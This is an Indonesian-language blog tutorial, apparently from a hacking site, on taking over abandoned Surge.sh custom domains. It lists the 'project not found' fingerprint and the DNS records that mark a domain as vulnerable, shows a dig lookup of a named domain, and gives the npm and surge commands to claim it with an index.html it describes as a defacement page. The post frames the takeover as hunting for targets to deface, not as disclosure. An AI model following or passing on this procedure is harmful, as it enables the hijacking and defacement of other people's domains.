• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

Surge.sh Custom Domain or Subdomain Takeover

September 29, 2018 by Jack Wilder 1 Comment

Surge.sh Custom Domain or Subdomain Takeover – Sejauh ini melakukan takeover domain di Surge adalah yang paling mudah. Bukan bermaksud meremehkan, namun proses yang harus dilalui sangat simpel.

Yang harus Diperiapkan

  • OS Linux – bebas mau di lokal atau di vps.
  • Nodejs – install nodejs

Vuln

Berikut ciri-ciri situs yang bisa ditakeover

Error:

project not found

Dan syarat domain bisa ditakeover adalah :

  • CNAME mengarah ke na-west1.surge.sh

atau

  • A Record mengarah ke 45.55.110.124

Kalau salahsatu syaratnya terpenuhi, maka bisa kita takeover. Contoh:

dig agilesysadmin.com

; <<>> DiG 9.10.3-P4-Ubuntu <<>> agilesysadmin.com
;; global options: +cmd
.......
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;agilesysadmin.com. IN A

;; ANSWER SECTION:
agilesysadmin.com. 3599 IN A 45.55.110.124
...........

How to Takeover

Pastikan kalian sudah install Nodejs. Sekarang install Surge via npm.

sudo npm install --global surge

Sekarang kita buat direktori untuk file Surge. Karena kita hanya akan men-takeover domain jadi cukup upload saja index.html dengan script defacement page.

mkdir surge
cd surge
nano index.html

Sekarang kita run surge dengan perintah

surge path_project namadomain.

Contoh

surge /home/linuxsec/surge/ agilesysadmin.com

Contoh jika berhasil.

Lalu sekarang coba cek domain yang berhasil kita takeover.

Oke sekian tutorial kali ini. Happy hunting.

Shares

Filed Under: Domain Takeover, Web Hacking

Reader Interactions

Comments

  1. paks says

    October 21, 2018 at 10:01 pm

    di termux bisa ga

    Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

WordPress Plugin CopySafe PDF Protection Shell Upload

WordPress Army Knife CSRF File Upload Vulnerability

Zendesk Custom Domain or Subdomain Takeover

DNS Hijacking through Social Engineering

MyBB 1.8.x SQL Injection Auto Exploit

Upload Backdoor Lewat MySQL Database (phpMyAdmin)

Tutorial Hack WHM dan cPanel dengan WHMCS Killer

Arti dari Kata Deface yang Sering Dibahas oleh para Hacker

Prestashop Module Blocktestimonial File Upload Auto Exploit

Reverse Shell From Local File Inclusion Exploit

LinuxSec / 73 queries in 0.10 seconds